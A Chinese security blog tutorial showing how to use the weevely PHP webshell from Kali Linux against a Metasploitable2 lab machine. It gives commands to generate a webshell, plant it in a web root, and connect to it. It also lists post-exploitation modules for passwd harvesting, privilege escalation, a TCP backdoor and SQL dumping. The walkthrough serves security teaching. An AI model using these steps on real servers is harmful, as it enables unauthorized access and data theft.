最新消息:

kali下的中国菜刀(二)

Kali Linux Eternal 7863浏览 0评论

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

weevely 同上篇文章介绍的 webacoo 一样,同属于php 的 webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。

准备环境:

kali linux

Metasploitables2

首先还是先制作一个 webshell ,密码为 secist:

weevely generate secist secist.php

可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。

20161014185456

我们使用 cat 命令简单查看下 webshell 的内容:

cat /usr/share/weevely/secist.php

20161014185525

现在我将生成的 webshell 远程拷贝到目标机器上:

scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin

20161014185822

接着,我们将拷贝到家目录下的 webshell 移动到站点根目录下:

sudo cp secist.php /var/www/

20161014190054

现在我们已经成功取得了目标的 webshell 权限,让我们来连接它:

weevely http://192.168.30.128/secist.php secist

可以从返回结果看到,我们成功与目标建立了 session !

20161014190249

现在我们输入一个简单的命令,来查看下:

ls

成功列举出了当前的文件目录。

20161014190540

同时,我们对该命令发送过程进行 wireshark 的抓包分析:

20161014190742

从TCP 追踪流,我们可以看到清晰地数据发送返回过程及内容:

20161014191035 20161014191056

除了以上最基本的使用,我们还可以使用其强大的管理模块!使用 help 命令来查看可用模块:

:audit_phpconf? 审计PHP配置文件

:audit_suidsgid? 通过SUID和SGID来查找文件

:audit_etcpasswd? 通过其它手段获取PASSWD

:audit_filesystem? 错误权限的审计系统文件

:shell_su 利用SU命令提权

:shell_php? 执行PHP命令

:shell_sh? 执行shell命令

:system_extensions? 收集PHP和web服务器的延伸列表

:system_info? 收集系统信息

:backdoor_tcp 在TCP类端口生成一个后门

20161014191325

以下是关于文件的相关操作,其实和直接输入系统命令效果是一样的,因此这里就不做过多介绍了!

20161014191349

:sql_dump 导出数据表

:sql_console 执行SQL查询命令或启动控制台

20161014191420

:net_ifconfig? 获取目标网络地址

:net_proxy? 通过本地HTTP进行代理

:net_scan? TCP端口扫描

:net_curl? 远程执行HTTP请求

:net_phpproxy? 在目标系统安装PHP代理

20161014191440

转载请注明:即刻安全 » kali下的中国菜刀(二)

您必须 登录 才能发表评论!



合作伙伴